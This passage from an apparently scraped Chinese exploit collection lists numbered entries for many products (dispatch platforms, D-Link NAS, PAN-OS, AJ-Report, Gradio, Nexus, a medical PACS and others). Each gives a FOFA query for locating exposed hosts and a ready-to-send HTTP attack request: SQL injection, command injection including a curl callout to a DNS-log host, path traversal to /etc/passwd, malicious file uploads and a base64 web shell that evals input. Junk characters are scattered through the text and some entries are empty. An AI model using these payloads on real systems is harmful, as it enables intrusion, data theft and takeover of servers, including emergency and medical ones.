FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 f4 X6 c* m4 ]GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
# T- b* @0 U  |/ w$ UHost: x.x.x.x, c, F! x. Z5 Z, w* v& g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 s2 t4 j" Q: m* A. _7 G/ P- j. UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' ], G  [* h5 b/ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# f1 i$ H; l% N( wAccept-Encoding: gzip, deflate, br( P+ _8 D4 h  N5 [: i
Connection: close
% f+ @% [& A. Q! B" t7 ]# qUpgrade-Insecure-Requests: 17 L% R! V6 q' F7 i3 x

6 ~  K- A7 K% O3 k2 k; q; i+ g2 n8 U- f; ~6 e8 ^/ N/ h
139. 福建科立讯通信指挥调度平台editemedia.php sql注入& x- o2 |' `! k8 j2 f+ D' d
CVE-2024-2622
/ B3 C- Y2 ^5 a5 `6 s3 Q& k4 LFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; _' Z- R" k$ J1 X+ H7 RGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.13 p5 g6 m. t9 n
Host: x.x.x.x
9 T4 U8 |# T" |" p& H$ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( K% k: C3 U; k* W  yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 b3 C' x# r* e5 A9 Q' w1 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) H  N) ^+ N" T: Z
Accept-Encoding: gzip, deflate, br
! m$ V- C, ]  J" o' b3 V- L1 Z1 WConnection: close
# o# h4 O4 v  \5 A1 uCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk* ?6 T- d4 n1 x$ ]1 a; b
Upgrade-Insecure-Requests: 1; [0 j6 x& A  |1 O
# }5 {9 r9 }# y
9 i5 H& }6 ~/ j& {
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入6 A& L2 g/ C0 Q+ k/ U
CVE-2024-2566
+ L3 Z; \9 x9 c: W# Y9 hFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 U4 d  L: }- C0 r% xGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1% O5 s% U% [* b4 G
Host: x.x.x.x5 G; h% ]1 ]4 M) |+ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 ^2 S' A7 w6 w) lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, N: g5 w* Z6 ~  W6 `' B7 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 v) U  A- }: ]% W
Accept-Encoding: gzip, deflate, br, s" i. Y( w, b; z% a$ M
Connection: close
( l% \' J/ M- E# C8 Q4 f1 G, J: JCookie: authcode=h8g9+ t& i( J0 L: B2 P+ j+ x
Upgrade-Insecure-Requests: 1  p0 \0 j2 `* s% s' g  `/ {

! B; g9 C+ P7 |; _  ^! b4 G, i% m4 l, p: [" ]+ D. W7 t+ I7 w
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
8 P0 E) l- ~6 v0 _  vFOFA:body="指挥调度管理平台"4 `3 f: H- s: a# T& N, E- P
POST /app/ext/ajax_users.php HTTP/1.1
+ j! _/ r1 K3 x/ a8 e- U, uHost: your-ip
5 P- X# T0 H  fUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info/ \5 U; \  \0 T) R3 {. }
Content-Type: application/x-www-form-urlencoded" H* M- d3 P/ N
* h/ @7 T; H% x" Q) h9 m
3 G7 ?7 k( l. ~4 R! }; @" N
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -4 S8 _( a8 O* F% X

, F6 M( Y$ t, m8 {
; c2 s7 Y2 z3 H5 x7 w. i142. CMSV6车辆监控平台系统中存在弱密码6 E7 K5 x! J+ D( N) d
CVE-2024-29666
- S5 P! q4 J! ^$ WFOFA:body="/808gps/"1 j; }0 ~% w+ v/ Y6 p
admin/admin! y4 S+ H2 p0 x2 ]7 y/ m% f
143. Netis WF2780 v2.1.40144 远程命令执行
3 v6 l9 r6 H9 i" e& T) WCVE-2024-25850/ U+ T3 H& U8 t* i
FOFA:title='AP setup' && header='netis'% \9 S4 ~4 X8 x8 w) G' e4 i
PAYLOAD: }7 h  c. G4 v
3 s; n  w9 n# g& t7 z
144. D-Link nas_sharing.cgi 命令注入
8 w- W* W7 m* WFOFA:app="D_Link-DNS-ShareCenter"& V2 Q3 L' {3 J- V# g% W8 p2 ]
system参数用于传要执行的命令% x* \, ^, {+ s# Q
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
8 G& |6 v, ]3 s- J  Z+ AHost: x.x.x.x
9 c  Y" |* g8 Y/ h$ p( tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
: }. H% Y( g6 s5 Q1 aConnection: close) D' ^+ }4 m$ U/ L
Accept: */*" Y0 v+ o/ ?: h+ G3 S) q
Accept-Language: en, R. N3 y) _( M
Accept-Encoding: gzip
+ A3 z4 N  F5 z) p7 F0 H: s
* L9 ~( Y( T$ _+ j+ p* U- T9 r  p( W; m, {' B5 W
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 P. H$ b- v0 L) Y) p# M- F  @CVE-2024-34005 v( b+ U" {$ K) z
FOFA:icon_hash="-631559155"
, \1 z0 o! z. C+ UGET /global-protect/login.esp HTTP/1.1
  d6 o7 _! |: n. `6 @Host: 192.168.30.112:1005
7 m/ e  T& |! R1 L0 H' _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
% I7 ^8 a" Q" WConnection: close* C+ @. f7 }, L' E( k9 {; z
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
* q: S4 A  T. U1 Z: c# }+ ~Accept-Encoding: gzip  o% W7 q* H! E* x( Y
  H1 S6 D) E( M7 }

( H2 S$ v3 r8 T1 t+ S. k) ~' [146. MajorDoMo thumb.php 未授权远程代码执行8 ?: o- L0 a9 ?: B  k/ ^7 S8 o
CNVD-2024-02175
6 n/ h2 \* }5 l" E# s" hFOFA:app="MajordomoSL"
  m4 a3 U' ^% YGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
1 H1 Q) w1 c/ r7 D7 IHost: x.x.x.x4 o, W- H, {5 C) b9 D: w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
& V2 ~( S$ J. a2 x" ~Accept-Charset: utf-8  t$ u4 c+ H$ z6 v( H! O! r
Accept-Encoding: gzip, deflate
1 H3 H% n' X! A& M# U$ q; ~) hConnection: close
/ D6 N! q! l3 H. R9 y# ~
6 F* V) F* ]" C: K
5 \) J8 N) Z- Y! ]147. RaidenMAILD邮件服务器v.4.9.4-路径遍历8 N2 l# u1 R6 Z% E1 Q9 v
CVE-2024-32399
! v: Q( [+ L+ Z7 M6 wFOFA:body="RaidenMAILD"2 R# v5 x; S- |4 G6 a# U5 L8 T
GET /webeditor/../../../windows/win.ini HTTP/1.1
" O4 A+ p8 w; G- OHost: 127.0.0.1:81
' ~/ ^  U# s% r  }% vCache-Control: max-age=0
, y# B9 a. Y6 y5 G: W, z( GConnection: close& S& a9 b: L- G1 O1 ?9 z

1 f' k. o1 u% }3 [0 M) h& O/ `5 C5 q1 f" d; G0 C7 G
148. CrushFTP 认证绕过模板注入
8 ?* b" S1 C8 H& ~/ j) |' bCVE-2024-4040
' |+ q: k# F, C: B! C+ q4 y( d0 YFOFA:body="CrushFTP"( S. k1 u" T$ M$ k) x, ^
PAYLOAD
# W" H5 m4 E2 M( Y4 O
4 |/ l0 E' D* I5 Y! E149. AJ-Report开源数据大屏存在远程命令执行1 F0 O+ N0 b8 V; \
FOFA:title="AJ-Report"8 R: @/ L' N2 R& [% X3 u) {) S
6 D: E/ |  P/ q9 x
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ B; t% g& M. ]; G2 D+ S6 y% H
Host: x.x.x.x
3 q( p: V! m7 H4 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 k) `8 p: r& j$ o" s5 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 ]8 Z+ K- ^' Z" M, x$ V
Accept-Encoding: gzip, deflate, br
8 z, w+ f8 |+ d( _9 I2 oAccept-Language: zh-CN,zh;q=0.9. E5 K( D; L$ ]: s' _
Content-Type: application/json;charset=UTF-8" h# N0 A. W4 u0 }8 s
Connection: close  ?4 G; C* n* H& U
1 K* D& ?2 e* Y1 _+ E- I
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
! d$ V& g7 f# `. Z3 n1 ^% O- N: b: l' G
150. AJ-Report 1.4.0 认证绕过与远程代码执行/ c& b6 Z% m6 v* q. q. ?3 c/ f
FOFA:title="AJ-Report"
& C0 l% [; e& Z) g+ w9 v& }4 dPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
* u6 J( ?% K9 I/ c- mHost: x.x.x.x, l  A: M2 Z% C1 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 P3 p. U2 V# d4 T/ c1 ~' y+ @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; `; {+ y' E( D' ^8 I2 o( CAccept-Encoding: gzip, deflate, br
+ S; s2 s4 m% D) x  {! rAccept-Language: zh-CN,zh;q=0.9
3 l/ {8 j3 z! d; D% RContent-Type: application/json;charset=UTF-8! f; C# @& `! r8 u* h6 x. E9 z4 P3 t
Connection: close4 h) I  e3 ^, U" N3 t/ m5 t! [
Content-Length: 339! E; d; p( O1 a; r

# Q. _7 [6 K1 T5 q{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}$ R. q( g5 N$ c  j) h

$ N9 g; S4 `+ g. D& N
+ C" w& Z. U) {6 |% j151. AJ-Report 1.4.1 pageList sql注入+ Q+ G# w: w5 X$ t3 U( U4 m
FOFA:title="AJ-Report"/ R0 m: I2 o5 s- F' Y  J" P
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1# a; X4 n/ d$ G/ [
Host: x.x.x.x5 d9 M7 @/ t( i' P+ {8 g7 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( i0 W: K2 G$ N* d
Connection: close- g+ @9 R9 C/ T4 E# D
Accept-Encoding: gzip
) W9 k& F  F: f+ ~9 V: |( h1 y+ `, s( ]% e" x7 w7 \2 w: K
$ Y0 O. X+ u+ \. b3 Q$ a- K: M6 }4 p6 j
152. Progress Kemp LoadMaster 远程命令执行  e- z* b  ], c, S; @: R
CVE-2024-1212' _: l2 S" V( j! B9 S; i  o6 p
LoadMaster <= 7.2.59.2 (GA), f& m" @) B/ P6 r: f" N
LoadMaster<=7.2.54.8 (LTSF)
& z7 |8 Y. y0 d% [6 ILoadMaster <= 7.2.48.10 (LTS)1 \  T, s3 I% ]! |5 P6 Q& O
FOFA:body="LoadMaster": H6 L: O. O7 }& F- m  O
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码4 `: p3 Q, A* v1 K; A% \2 F& _7 j
GET /access/set?param=enableapi&value=1 HTTP/1.1" `0 v% y% y* |9 y
Host: x.x.x.x
; r4 t! u, |4 M% D9 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
9 C+ p6 y! h. qConnection: close; l+ A7 R& H8 z0 g, s$ ?
Accept: */*: `0 v2 n/ |+ W/ @! X5 M9 s
Accept-Language: en
9 O9 I/ Q. Q* Y" Z; IAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=4 D+ x+ l+ m" T; C+ V
Accept-Encoding: gzip2 H4 D: E9 c& }5 p$ |; ^

0 f7 }7 \7 g# v( q0 E- |/ }3 u& N5 c3 C5 C
153. gradio任意文件读取
% |6 D3 j7 R; k+ \# W0 ]CVE-2024-1561FOFA:body="__gradio_mode__"
2 v) k9 y* w0 ~! ?! B* S第一步,请求/config文件获取componets的id9 M9 p( p) F9 s$ o4 V, b) J
http://x.x.x.x/config) h% h0 o( S# B
( _, ~1 l7 Z% O* Y

6 w0 v4 q; d, W) t第二步,将/etc/passwd的内容写入到一个临时文件
  Z$ a- H9 ?. F: S; {4 ^6 p8 f& BPOST /component_server HTTP/1.1
# J. J9 D% g2 a( L+ ]Host: x.x.x.x( H: }$ C6 l: l2 q# Y+ \! K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
6 [- f9 V7 l4 D( K* c3 LConnection: close
1 e& r3 P& G" E! y( lContent-Length: 115. \; z6 {* @5 Y; z. E
Content-Type: application/json
$ J* c# Y* b( ]" `% [Accept-Encoding: gzip* T4 w/ m3 C/ C6 t( w
$ Y! W5 d$ h3 H# i
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
8 ^! Z) O5 W" {
* G/ b' f2 t7 F& a2 U! x# c" l/ z; E" X7 y/ e
第三步访问3 K. g& f& S1 x, R1 o
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd) W7 o2 D% Y3 a* g! F

3 c6 x5 J. w2 u; I% i* G# z4 x1 t6 V; d* s6 j
154. 天维尔消防救援作战调度平台 SQL注入/ y( b1 m2 w, G5 }5 q% t
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"; w8 J5 n, V9 I6 G
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
3 ~- s. y6 k3 t. V% lHost: x.x.x.x! ]2 `( I. B( V$ d
Content-Length: 106, [' ^' n) ~" h! Y4 N+ f
Cache-Control: max-age=0
" u/ v6 r; a+ g/ lUpgrade-Insecure-Requests: 1
) W; N+ B( S" i4 a  R1 WOrigin: http://x.x.x.x
  H% w3 N' \+ }" DContent-Type: application/json; Q3 G# f- E: }7 ~7 W+ K6 m) {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 h+ a3 E  d( t) t: e( D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ r8 W7 _7 n9 k2 ^) n6 PReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page% h- C+ h. X8 }. _7 _% U
Accept-Encoding: gzip, deflate
2 n* }8 G8 p3 `Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7. }3 }8 y+ d& q' W
Connection: close- T$ P9 V9 K/ n. s
) S2 T  F, H4 M! V
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
" L( d8 h2 G* X8 r
: p  \7 h; t/ b! A( _& K) A5 M$ f4 t$ v$ U# f: ?3 m
155. 六零导航页 file.php 任意文件上传6 g( A7 D) H( W  `
CVE-2024-34982
# b, n4 a0 o8 C& I. F' P% zFOFA:title=="上网导航 - LyLme Spage"/ w+ S" `( n1 l* N5 x
POST /include/file.php HTTP/1.1+ ^5 M; S( A& d% [! I
Host: x.x.x.x/ @* {& j' K5 N9 j: D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
  G2 n& ^" L. x$ C) ZConnection: close! H/ X2 k2 [3 K2 j7 L! U
Content-Length: 232
4 _  v8 W1 y9 [. s' {Accept: application/json, text/javascript, */*; q=0.01
7 Z2 T" _0 P# B& Q1 k- R, W$ C9 uAccept-Encoding: gzip, deflate, br/ K3 d$ H+ k) t6 p# l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% l: j. I) i- h: }* P- B& R8 F' fContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f- K+ A. i& _8 H
X-Requested-With: XMLHttpRequest0 h3 Q' n+ R% c# `8 M: _

9 K% @0 K, {- H2 B, D-----------------------------qttl7vemrsold314zg0f
# k6 n$ n. |! |+ s* jContent-Disposition: form-data; name="file"; filename="test.php"# J' c" s9 B1 u9 m& v( A
Content-Type: image/png* E) H: V, C: m; `& |

. T9 E& k$ _7 v) q$ U, I<?php phpinfo();unlink(__FILE__);?>+ l7 a9 G8 s+ T! U; V
-----------------------------qttl7vemrsold314zg0f--( V# z8 b8 n( f/ p% {

# Y$ \  t- G) i2 b, a! |4 L
$ `5 n( L# _8 O. ?访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
- C& U* b# A# M) M% V8 U1 k8 ~5 Y# Y' y" N9 |( [
156. TBK DVR-4104/DVR-4216 操作系统命令注入9 l2 \  E! _# y/ t  ~) M
CVE-2024-3721
1 F0 @1 u9 [6 `& V& DFOFA:"Location: /login.rsp"
" ~/ X6 a" M; w1 w0 X( J·TBK DVR-4104
- ~8 Z% n4 u+ G·TBK DVR-42166 L6 Z3 A$ \2 _# R" [' r0 a) U
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"8 |2 b8 o) Y) ?- x  X6 L4 }7 f( {

9 h" M* g) V2 u$ i* T' R/ i
$ z- o) d$ O5 u/ k+ DPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1# G7 T2 C* x5 {, d/ ~
Host: x.x.x.x; Q" G8 P! T6 C% r/ s
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, {! j8 p, G* P8 q
Connection: close2 _, j0 V( O5 C) {$ Z! E4 @1 G
Content-Length: 0
2 ?) @8 Q/ z; ?" B! s7 f6 W5 ~; h- nCookie: uid=1' w* o5 _& n* Y+ I
Accept-Encoding: gzip
/ D8 N3 i7 _, ~
+ H* {& ]- o% C/ B  H# O) Y$ D
9 l2 ?$ r% l$ _, f157. 美特CRM upload.jsp 任意文件上传! G1 e: M, W# l# q8 ]
CNVD-2023-06971
$ T, {0 |9 R5 c+ M1 BFOFA:body="/common/scripts/basic.js"2 C* b' D, t  Y/ k) B9 C' v1 p
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1  a2 @0 N* f8 h
Host: x.x.x.x! A1 R7 h% @& [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 `1 [& `) G  ~# nContent-Length: 7094 O  L& f4 H/ ~3 g3 g2 h* t$ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; {9 w' {1 Z) ]$ ?
Accept-Encoding: gzip, deflate
+ Z* @. e: k& h9 ~9 a; A' sAccept-Language: zh-CN,zh;q=0.9
" R1 {; P$ T3 V& E/ c, ]Cache-Control: max-age=0
6 G4 x. m+ u! b5 B" t5 ]& S0 tConnection: close
) b! L% f& x1 D$ tContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
; X- T$ t4 s/ g/ H$ f9 LUpgrade-Insecure-Requests: 1+ v+ Y+ g7 N; f! I' z1 b
$ {7 {) m( |( ]1 B9 z$ h
------WebKitFormBoundary1imovELzPsfzp5dN% C  ~2 O( ]4 z8 ]  l( R, h
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
/ n' h" M/ }' Q: F3 t- @$ BContent-Type: application/octet-stream
* k5 u, l! _3 R' |5 X
( |, z& O2 v6 p* z# P, V/ mnyhelxrutzwhrsvsrafb
% e, E" L1 k3 ~. M7 l1 ?------WebKitFormBoundary1imovELzPsfzp5dN
( l/ T! V3 Y* q+ j" T: H: m% ]' oContent-Disposition: form-data; name="key"
9 ?$ T- |$ `# X& H) U( v
; S- c& _. s1 ^null
  H; \, ^0 Y0 ~------WebKitFormBoundary1imovELzPsfzp5dN
5 Q/ `3 }$ ^7 k- uContent-Disposition: form-data; name="form"
+ t( E, N2 r: c/ i' V) s/ |' d& w4 L# x$ a3 O3 U8 O5 x
null
5 |; p  f9 W. Q. g8 c------WebKitFormBoundary1imovELzPsfzp5dN
8 n$ ]$ H, J& G) ^* v: @Content-Disposition: form-data; name="field"' h' b) O$ ^5 @& w* g

2 i4 `, p1 q' k" C$ w* v$ q# hnull
3 [, ]9 l6 f# I! U, ]+ y& ~( h------WebKitFormBoundary1imovELzPsfzp5dN2 v5 X& ?6 h) x9 A* w/ C+ Q( Z
Content-Disposition: form-data; name="filetitile"
) E: R7 j. R& a3 N: q) E- w6 y' B8 u% ^2 v  l" k
null
( g4 G( [0 M9 G" x------WebKitFormBoundary1imovELzPsfzp5dN
3 I1 ^% z' n1 r( C) S; p8 r9 |' tContent-Disposition: form-data; name="filefolder"/ R4 F4 c5 g# C% a! g* ]: n- ?. D

9 J9 z! j+ {  @' pnull# D1 i0 z3 B$ B$ V$ t6 c- V
------WebKitFormBoundary1imovELzPsfzp5dN--4 a" D) \, m- n+ k3 e! v

( D1 T  Y% q- [  S. c! ], H6 V/ a
2 _4 u2 n6 Y. ?7 l& W& Y  C* G. ohttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
9 P' f% v0 L- Q# _) S5 h8 j5 C2 l2 D" k, M2 L
158. Mura-CMS-processAsyncObject存在SQL注入5 H+ J' K! Z& ^4 S
CVE-2024-32640
: {& _3 O& N* x# U- R! w; t) xFOFA:"Generator: Masa CMS"3 X9 }  o, H6 ?* b* r5 |
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: g2 n0 ^, s6 u4 y) k% k0 U' GHost: {{Hostname}}( Z. H  V2 O2 j, i4 t7 ~2 `
Content-Type: application/x-www-form-urlencoded2 q1 U4 F3 p" m* L4 G8 _3 i
! d5 i  c% j  f1 B/ b; a, N% w
object=displayregion&contenthistid=x\'&previewid=1. ^! w7 a+ M( P0 i# J1 R: f0 P

4 S3 r: L, [; ?; ~
9 [/ _, h8 B9 K159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
/ P( H4 |) z; J* }0 G! t; _FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
; @9 v6 W; W0 x9 N3 H( ePOST /webservices/WebJobUpload.asmx HTTP/1.1
/ G6 }" [1 S7 Y: _& pHost: x.x.x.x& u7 c: F# j- ?% N" A1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. ]: x* F+ t3 Q0 ]8 Y& O3 r5 t5 U
Content-Length: 1080
' S* z( w# {) g. P0 a  FAccept-Encoding: gzip, deflate1 z% {/ M# d" Z3 h0 i& c7 c
Connection: close4 M. K* u8 p. J) c
Content-Type: text/xml; charset=utf-8
% {2 u( w" }- J' ~8 [Soapaction: "http://rainier/jobUpload"# M( x) I  M) M- r$ m) h

! N# j$ I8 S4 p<?xml version="1.0" encoding="utf-8"?>
, A+ Z9 E& h% F<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 W9 C# E6 \. K* h& M2 c
<soap:Body>
3 L  r" \5 @7 l* Q, B<jobUpload xmlns="http://rainier">1 l8 a+ V7 S/ D+ R" P; f: j
<vcode>1</vcode>
/ _2 x! v6 m$ ?. {) @. O" b<subFolder></subFolder>
2 s# ^. w( Z$ y  Y<fileName>abcrce.asmx</fileName>
, h7 z. t- k1 T<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 H5 K! A" y; P8 v1 e! _</jobUpload>) k7 P3 R! k" S& M
</soap:Body>5 i( S% ]6 o. Q3 z$ p# R/ m
</soap:Envelope>
5 e) K) p) ]# Q7 X
6 h/ q% `% y6 n# h8 A% {$ d( K8 J; ~8 \* r; b: _% j+ k; G$ r
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
- z  L+ Y2 X% B5 s: F$ q1 p* J; |
: N# }( r6 m0 n5 g% B* {
- e0 V1 f  g. ]: a160. Sonatype Nexus Repository 3目录遍历与文件读取
9 y3 w& _& ]/ R# TCVE-2024-4956* s" M2 u7 h5 E4 e% ?  l& Q
FOFA:title="Nexus Repository Manager"# v# R  K8 d5 G' c6 u
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1- Z- `% V0 r0 E* d! @9 t
Host: x.x.x.x
. V; z1 [0 l+ d, }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.06 t; B6 N# P/ B# Q7 G: x- M  p
Connection: close5 t' q$ ~5 h0 W7 O: l
Accept: */*4 B4 q2 |, I8 Y: k3 K
Accept-Language: en
( T# G1 H  E4 ~" H0 YAccept-Encoding: gzip
) o0 q* R; K) ?) t, z) B6 k& }5 s' W. P. q: m
5 ]" W6 o9 w, O" Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传  t9 l+ V  o& K' V- t) ]& }+ V) [# ~
FOFA:body="/KT_Css/qd_defaul.css") C  p' ^( A4 ?/ f- e+ E8 }7 Z
